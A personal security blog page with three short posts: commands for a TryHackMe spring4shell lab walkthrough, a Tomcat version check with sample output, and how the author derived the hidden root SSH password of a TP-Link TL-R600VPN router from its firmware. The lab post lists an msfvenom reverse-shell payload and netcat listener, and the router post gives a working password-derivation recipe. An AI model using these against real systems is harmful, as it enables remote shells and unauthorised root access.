Category: Security

TryHackMe spring4shell room

Post author By kpatenaude
Post date April 16, 2022
No Comments on TryHackMe spring4shell room

A walkthrough of the TryHackMe room spring4shell.
https://tryhackme.com/room/spring4shell

Commands used in this video
nc -lvnp 80
python3 -m http.server 8000
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<tryhackme_vpn_ip> LPORT=80 f elf > shell.elf

Security

tomcat version

Post author By kpatenaude
Post date October 15, 2020

Ubuntu
/usr/share/tomcat8/bin/version.sh
results

Using CATALINA_BASE:   /usr/share/tomcat8
Using CATALINA_HOME:   /usr/share/tomcat8
Using CATALINA_TMPDIR: /usr/share/tomcat8/temp
Using JRE_HOME:        /usr
Using CLASSPATH:       /usr/share/tomcat8/bin/bootstrap.jar:/usr/share/tomcat8/bin/tomcat-juli.jar
NOTE: Picked up JDK_JAVA_OPTIONS:  --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED
Server version: Apache Tomcat/8.5.39 (Ubuntu)
Server built:   Sep 9 2019 19:47:51 UTC
Server number:  8.5.39.0
OS Name:        Linux
OS Version:     4.15.0-112-generic
Architecture:   amd64
JVM Version:    11.0.8+10-post-Ubuntu-0ubuntu118.04.1
JVM Vendor:     Ubuntu

Amazon Linux (AL2)
/usr/sbin/tomcat version

Security

ssh access | tp-link TL-R600VPN

Post author By kpatenaude
Post date September 28, 2020
Sticky post

The tp-link TL-R600VPN is a nice low-cost NAT router.

While trying to add a long list of URLs from http://www.shallalist.de/ for URL filtering, I kept bumping into a limit of 25. So, I figured there must be a way to update the list from the command line.

Turning on SSH

There is not an option to turn on SSH. However, there is Remote Assistance (System Tools -> Diagnostics -> Remote Assistance).

After Remote Assistance is turned on there is not an obvious username and password to use to access ssh. This is something that only support is supposed to use.

Finding password

Following this article gave me a great start on figuring out the SSH creds. The article references going to squashfs-root/etc/ and viewing the shadow file for the root password. In this case, the RS600VPN firmware did not have the password. Looking in the squashfs-root/etc/init.d folder did uncover startup scripts.
Enter Dropbear
The dropbear startup init script includes a section to generate a new password on startup.


getNewPasswd()
{
. /lib/functions.sh 
local macAddr=""
local username=""
macAddr=$(uci_get tddp macaddr macaddr)
username=$(uci_get "accountmgnt.@account[0].username")
echo "macAddr is $macAddr" > /dev/console
#echo "username = $username" > /dev/console


local key=$(echo -n "$macAddr""$username" | md5sum)
key=$(echo ${key:0:16})
#echo "key is $key" > /dev/console


echo ${key}
}

Break it down
macAddr references the LAN MAC. Found here Network -> MAC
example: D8:47:32:12:34:56
username references the user that was created during the setup process
example: administrator
local key puts the two pieces together and pipes it to md5
D8:47:32:12:34:56administrator | md5sum d53ffaa1f8b8ce3b62f6b60673800d0

key=$(echo ${key:0:16} takes the hash, and only uses the first 16 characters of that hash as the password.
d53ffaa1f8b8ce3b
Now we have the password

SSH as root
ssh root@192.168.2.1
provide the password: d53ffaa1f8b8ce3b

Victory!